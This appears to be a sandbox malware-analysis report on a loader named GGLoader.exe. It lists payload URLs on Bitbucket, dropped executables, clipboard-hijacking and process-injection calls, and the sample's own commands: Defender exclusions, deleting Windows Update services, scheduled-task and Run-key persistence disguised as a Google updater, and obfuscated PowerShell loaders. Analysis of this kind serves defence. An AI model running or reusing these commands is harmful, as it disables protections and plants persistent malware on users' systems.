                        Source: powershell.exe, 00000001.00000002.1964124917.000001EC48EA7000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://bitbucket.org/B
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.ex
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://cdn.cookielaw.org/
                        Source: powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31BC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                        Source: powershell.exe, 00000028.00000002.2246120062.000001C51F62A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000003.00000002.1768225702.000002511F4A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C520930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000028.00000002.2580308005.000001C536C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co&
                        Source: powershell.exe, 00000001.00000002.1925142827.000001EC40A84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512EA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512E8E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002512014C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2140674795.00000270C7706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2555004791.000001C52E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F6B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000003.00000002.1768225702.000002511FF03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 00000003.00000002.1768225702.000002511FF03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: svchost.exe, 00000035.00000003.2349769567.000001D5599A5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_00792B90 OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,6_2_00792B90
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_00792B90 OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,6_2_00792B90
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BE2B90 OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,35_2_00BE2B90
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_00792C80 OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,6_2_00792C80

                        Spam, unwanted Advertisements and Ransom Demands

                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe | File written: C:\Windows\System32\drivers\etc\hosts

                        System Summary

                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | File dump: svcupdater.exe.6.dr 831814656
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\LicenseGet.exe
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\LicCheck.exe
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\LicSend.exe
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Code function: 6_2_00793F90 IsDebuggerPresent,GetModuleHandleW,GetProcAddress,GetTickCount64,NtDelayExecution,GetTickCount64
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe | Code function: 7_2_00007FF7D3B994C0 NtCreateUserProcess
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe | Code function: 35_2_00BE3F90 IsDebuggerPresent,GetModuleHandleW,GetProcAddress,GetTickCount64,NtDelayExecution,GetTickCount64
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 40_2_00007FFD9BAB02CE NtUnmapViewOfSection
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 40_2_00007FFD9BAAF0E0 NtResumeThread
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 40_2_00007FFD9BAAF0C0 NtSetContextThread
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 40_2_00007FFD9BAB06C8 NtResumeThread
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 40_2_00007FFD9BAB04ED NtWriteVirtualMemory,NtSetContextThread
                        Source: C:\Windows\System32\dllhost.exe | Code function: 42_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle
                        Source: C:\Windows\System32\winlogon.exe | Code function: 43_2_00000225DC642A7C NtEnumerateValueKey,NtEnumerateValueKey
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Code function: 6_2_00793B60: GetSystemInfo,GlobalMemoryStatusEx,CreateFileA,DeviceIoControl,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_gckjyekc.li0.ps1
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Code function: String function: 007A5D90 appears 54 times
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe | Code function: String function: 00BF5D90 appears 54 times
                        Source: poduiwcd.tmp.7.dr | Static PE information: Resource name: EXE type: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                        Source: updater.exe.7.dr | Static PE information: Number of sections : 11 > 10
                        Source: LicSend.exe.1.dr | Static PE information: Number of sections : 11 > 10
                        Source: LicenseGet.exe.1.dr | Static PE information: No import functions for PE file found
                        Source: LicenseGet.exe.1.dr | Static PE information: Data appended to the last section found
                        Source: GGLoader.exe, 00000000.00000000.1702359898.0000000000FD8000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameD1.exe4 vs GGLoader.exe
                        Source: GGLoader.exe | Binary or memory string: OriginalFilenameD1.exe4 vs GGLoader.exe
                        Source: GGLoader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                        Source: C:\Users\user\Desktop\GGLoader.exe | Process created: Commandline size = 3770
                        Source: unknown | Process created: Commandline size = 5455
                        Source: unknown | Process created: Commandline size = 5516
                        Source: GGLoader.exe, dmjzx.cs | Base64 encoded string: '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
                        Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.mine.winEXE@64/89@1/2
                        Source: C:\Windows\System32\dllhost.exe | Code function: 42_2_0000000140002328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceA,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,HeapAlloc,CreateThread,CreateThread,Sleep,SleepEx
                        Source: C:\Windows\System32\dialer.exe | Code function: 37_2_00007FF790DC17A4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString
                        Source: C:\Windows\System32\dialer.exe | Code function: 37_2_00007FF790DC194C FindResourceExA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,RegOpenKeyExW,RegSetValueExW
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe | File created: C:\Program Files\Google\Chrome\updater.exe
                        Source: C:\Users\user\Desktop\GGLoader.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\GGLoader.exe.log
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7232:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3412:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3332:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aro4libn.snb.ps1
                        Source: GGLoader.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: GGLoader.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\GGLoader.exe | File read: C:\Users\user\Desktop\desktop.ini
                        Source: C:\Users\user\Desktop\GGLoader.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe | File read: C:\Windows\System32\drivers\etc\hosts
                        Source: GGLoader.exe | ReversingLabs: Detection: 76%
                        Source: unknown | Process created: C:\Users\user\Desktop\GGLoader.exe "C:\Users\user\Desktop\GGLoader.exe"
                        Source: C:\Users\user\Desktop\GGLoader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\LicCheck.exe "C:\Users\user\AppData\Local\Temp\LicCheck.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\LicSend.exe "C:\Users\user\AppData\Local\Temp\LicSend.exe"
                        Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                        Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i
'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QgCYtqphZUyk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MPiGGXNLyYxMMn,[Parameter(Position=1)][Type]$YKFTYMbQTB)$nMulMONdbgM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+'c'+''+'t'+'e'+[Char](100)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+'ed,A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nMulMONdbgM.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MPiGGXNLyYxMMn).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$nMulMONdbgM.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[C
